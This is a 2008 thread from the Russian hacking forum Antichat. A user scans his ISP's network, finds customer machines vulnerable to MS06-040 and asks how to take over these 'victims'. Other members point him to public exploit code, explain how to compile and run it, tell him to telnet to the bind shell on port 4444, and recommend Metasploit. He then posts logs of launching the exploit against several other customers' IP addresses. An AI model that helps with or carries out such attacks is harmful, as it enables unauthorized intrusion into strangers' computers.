Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Windows (https://forum.antichat.xyz/forumdisplay.php?f=42)
-   -   Удаленное выполнение команд (ms06-040) (https://forum.antichat.xyz/showthread.php?t=82342)

Ru}{eeZ 25.08.2008 22:38

Удаленное выполнение команд (ms06-040)
 
Решил просканировать сеть своего провайдера (Domolink) и нашёл одну уязвимость у большого количества пользователей, уязвимость ms06-040.
Сканирую я программой XSpider. Прошу вас объяснить как с помощью этой уязвимости можно получить доступ к компьютеру жертвы, зарание большое спасибо и плбсы с меня :) .

````````````````````````````````````
Краткое описание:
Уязвимости позволяют удаленному атакующему выполнить произвольный код с системными привилегиями.
Подробное описание:
В службе Server присутствует уязвимость переполнения буфера. Удаленный атакующий с помощью специальным образом сформированного запроса может вызвать отказ в обслуживании или выполнить произвольный код с системными привилегиями и получить полный контроль над системой.
Уязвимые версии:
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
````````````````````````````````````

remb0 25.08.2008 22:50

Этот вопрос обсуждался здесь

Ru}{eeZ 25.08.2008 22:57

Цитата:

Сообщение от remb0
Этот вопрос обсуждался здесь

Спасибо большое! :)

Ru}{eeZ 25.08.2008 23:03

А там юзверь скинул ссылку на страницу http://www.securitylab.ru/poc/extra/271817.php , что делать с кодом, то там написан?)

SVAROG 25.08.2008 23:22

на милворме пробывал искать?
http://milw0rm.com/exploits/2265

BuG_4F 25.08.2008 23:23

Хм ... А в каком регионе ты живеш ? Уязвимость есть во всех сетях домолинк ?

ртуть 25.08.2008 23:23

это РоС код, т.е. показательное эксплуатирование )))
запускаешь через metasploit =)

PS Хня на постном масле :Р

Ru}{eeZ 25.08.2008 23:30

Цитата:

Сообщение от BuG_4F
Хм ... А в каком регионе ты живеш ? Уязвимость есть во всех сетях домолинк ?

Да я просто пробил по маске своего провайдера, других смотреть не тянуло, там мне кажется, что ничего от провайдера не зависит, всего на 4х компах пока нашёл)

Ru}{eeZ 25.08.2008 23:33

Цитата:

Сообщение от SVAROG
на милворме пробывал искать?
http://milw0rm.com/exploits/2265

Да, спасибо, но я не понимаю что с этим текстом делать) точнее по объяснению ртуть нужно пропустить текст через некий metasploit, это программа такая?

geezer.code 26.08.2008 00:13

Цитата:

Сообщение от Ru}{eeZ
Да, спасибо, но я не понимаю что с этим текстом делать)

Деточка. это код с++ и сначала ЭТО надо скомпилировать. а уже потом пользовать так как написано в описании.

Ru}{eeZ 26.08.2008 00:40

теперь понял, спс))

Ru}{eeZ 26.08.2008 21:22

Народ, подскажите, вот кажется ломанул я комп, пишет:
F:\>2.exe 10.130.140.51 2
[+] Connecting to 10.130.140.51 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.140.51:4444 !

что дальше то?
почему-то опять отображается мой диск для ввода(F)!, а ведь как я понимаю должен его (C) (как я понимаю по стандарту)?

remb0 26.08.2008 21:33

пиши так telnet 10.130.140.51 4444

gisTy 26.08.2008 23:10

не надо было человеку про метасплойт рассказывать..;)

Ru}{eeZ 26.08.2008 23:36

Цитата:

Сообщение от gisTy
не надо было человеку про метасплойт рассказывать..;)

Так я без него всё скомпилировал и настроил (благодаря SVAROG и remb0 :) )

Ru}{eeZ 26.08.2008 23:56

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

F:\Documents and Settings\Илья>св \
"св" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.

F:\Documents and Settings\Илья>cd \

F:\>2.exe 10.130.145.7 2
[+] Connecting to 10.130.145.7 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.7:4444 !

F:\>telnet 10.130.145.7
Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор
т 23: Сбой подключения

F:\>telnet 10.130.145.7 4444
Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор
т 4444: Сбой подключения

F:\>ping 10.130.145.7

Обмен пакетами с 10.130.145.7 по 32 байт:

Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127
Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127
Ответ от 10.130.145.7: число байт=32 время=60мс TTL=127
Ответ от 10.130.145.7: число байт=32 время=58мс TTL=127

Статистика Ping для 10.130.145.7:
Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
Минимальное = 58мсек, Максимальное = 61 мсек, Среднее = 60 мсек

F:\>2.exe 10.130.145.8 2
[+] Connecting to 10.130.145.8 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.8:4444 !

F:\>telnet 10.130.145.8 4444
Подключение к 10.130.145.8...Не удалось открыть подключение к этому узлу, на пор
т 4444: Сбой подключения

F:\>2.exe 10.130.145.13 2
[+] Connecting to 10.130.145.13 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.13:4444 !

F:\>telnet 10.130.145.13 4444
Подключение к 10.130.145.13...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>telnet 10.130.145.13:4444
Подключение к 10.130.145.13:4444...Не удалось открыть подключение к этому узлу,
на порт 23: Сбой подключения

F:\>2.exe 10.130.145.39 2
[+] Connecting to 10.130.145.39 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.39:4444 !

F:\>telnet 10.130.145.39 4444
Подключение к 10.130.145.39...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>2.exe 10.130.145.51 2
[+] Connecting to 10.130.145.51 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.51:4444 !

F:\>telnet 10.130.145.51 4444
Подключение к 10.130.145.51...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>2.exe 10.130.145.58 2
[+] Connecting to 10.130.145.58 ...
[+] Binding to RPC interface ...
[+] Sending RPC request ...
[+] Now check for shell on 10.130.145.58:4444 !

F:\>telnet 10.130.145.58 4444
Подключение к 10.130.145.58...Не удалось открыть подключение к этому узлу, на по
рт 4444: Сбой подключения

F:\>








``````````````````````
Видимо уже не прёт эта бага... кто-как считает?

Ru}{eeZ 27.08.2008 14:21

Народ, так в чём проблема? Подскажите плиз! Может фаер? Или ещё что???

DeBugger 27.08.2008 14:27

А он вообще срабатывает? Или в любом случае пишет "Now check for shell on 4444 !"?

Ru}{eeZ 27.08.2008 16:45

Срабатывает, я проверял, и пишет это только на дырявых компах :(

SVAROG 27.08.2008 16:58

заюзай метасплоит там легче будет http://www.metasploit.com/framework/downloader/?id=framework-3.0.exe

Ru}{eeZ 27.08.2008 17:02

У меня стоит 3.1, только я с ним не разбирался, да и вообще почему-то ничего из него не запускается(

Ru}{eeZ 27.08.2008 22:31

Такая распространённая дырка в сети, жаль, что никто не знает как через неё законектиться...жали, жаль...

gisTy 27.08.2008 22:46

а ты не думал, что в сплойте может стоять защита от детей?

Ru}{eeZ 28.08.2008 01:31

Цитата:

Сообщение от gisTy
а ты не думал, что в сплойте может стоять защита от детей?

Как я вижу у тебя не получается его заюзать?


Время: 14:05